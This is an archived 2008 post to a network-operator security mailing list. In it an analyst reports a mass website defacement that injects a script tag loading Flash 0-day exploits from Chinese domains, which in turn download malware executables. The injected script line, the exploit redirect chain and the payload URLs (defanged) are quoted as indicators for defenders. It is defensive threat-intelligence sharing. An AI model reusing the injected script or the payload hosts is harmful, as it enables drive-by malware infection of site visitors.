[nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild

Brian Eckman eckman at umn.edu
Tue May 27 16:08:30 EDT 2008 

nsp-sec,

 > host www.dota11.cn
www.dota11.cn has address 221.206.20.145

 > host www.woai117.cn
www.woai117.cn has address 221.206.20.145

 > host www.117276.cn
www.117276.cn has address 221.206.20.145


AS      | IP               | AS Name
4837    | 221.206.20.145   | CHINA169-BACKBONE CNCGROUP China169 Backbone

PEER_AS | IP               | AS Name
174     | 221.206.20.145   | COGENT Cogent/PSI
701     | 221.206.20.145   | UUNET - MCI Communications Services, Inc. d/b/a 
Verizon Business
1239    | 221.206.20.145   | SPRINTLINK - Sprint
3257    | 221.206.20.145   | TISCALI-BACKBONE Tiscali Intl Network BV
3320    | 221.206.20.145   | DTAG Deutsche Telekom AG
4134    | 221.206.20.145   | CHINANET-BACKBONE No.31,Jin-rong Street
7018    | 221.206.20.145   | ATT-INTERNET4 - AT&T WorldNet Services
7473    | 221.206.20.145   | SINGTEL-AS-AP Singapore Telecom


(Malicious URLs sanitized to (dot)cn instead of .cn to avoid accidental access.)

This is all based off my experience with this problem this afternoon, and is
surely incomplete. However, I hope that it's timely and helpful regardless...

Many of you have probably seen reports of a 0-day exploit in Adobe Flash
Player. SANS Internet Storm Center has a diary entry at
http://isc.sans.org/diary.html?n&storyid=4465. Symantec raised their
ThreatCon as outlined at
http://www.symantec.com/security_response/threatconlearn.jsp

I've seen evidence of a mass defacement (similar - likely identical - to the
recent SQL injections apparently coming from China and noted in various 
advisories), where <script src=http://www.dota11(dot)cn/m.js> has
been inserted into the HTML source of many Web sites. m.js on that site,
among other things, loads up http://www.woai117(dot)cn/4561.swf or
http://www.woai117(dot)cn/4562.swf. After one of those flash scripts
determines the flash version, the browser is then pointed to
http://www.woai117(dot)cn/WIN%20<insert-flash-player-version-here>[f|i].swf
(example: http://www.woai117(dot)cn/WIN%209,0,115,0f.swf for Adobe Flash
Player 9,0,115,0 for Windows) (likely more than just the letters "f" and "i"
can be appended - again - I'm just sharing what I've observed in limited
testing).

In my testing, the exploits for 9,0,124,0 are NOT there, even though
browsers will be pointed to a page like "WIN%209,0,124,0f.swf" (a 404 page
is returned with no additional exploits, as far as I've seen). My hunch is
that there were exploits for that version earlier (simply based off of
Symantec's claim), but pulled it for some reason - perhaps to try to keep
certain 0day code as 0day for longer. (Or else Symantec is wrong. Not like
that ever happens!)   ;-)

On my test XP box with Flash Viewer 9,0,115,0, the "GET
/WIN%209,0,115,0f.swf" request downloaded the .swf, which in turn ultimately
caused all of the following to be downloaded and executed:

http://www.woai117(dot)cn/117.exe
http://www.117276(dot)cn/1.exe
http://www.117276(dot)cn/2.exe
http://www.117276(dot)cn/3.exe
http://www.woai117(dot)cn/bing.exe
http://www.woai117(dot)cn/kiss.txt

The snort rule "ET TROJAN Otwycal User-Agent (Downing)" was triggered by
most, if not all of those downloads.

117.exe analysis
----------------
Virustotal: http://www.virustotal.com/analisis/20e51bbef245e3eeb3dd9b9835c09291
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483924c

Anubis Sandbox: 
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483924c


I believe that queries for "www.117276(dot)cn" might be a reliable indicator
of a successful infection - particularly if preceded by "www.dota11(dot)cn"
and "www.woai117(dot)cn".

Brian
-- 
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance

More information about the nsp-security mailing list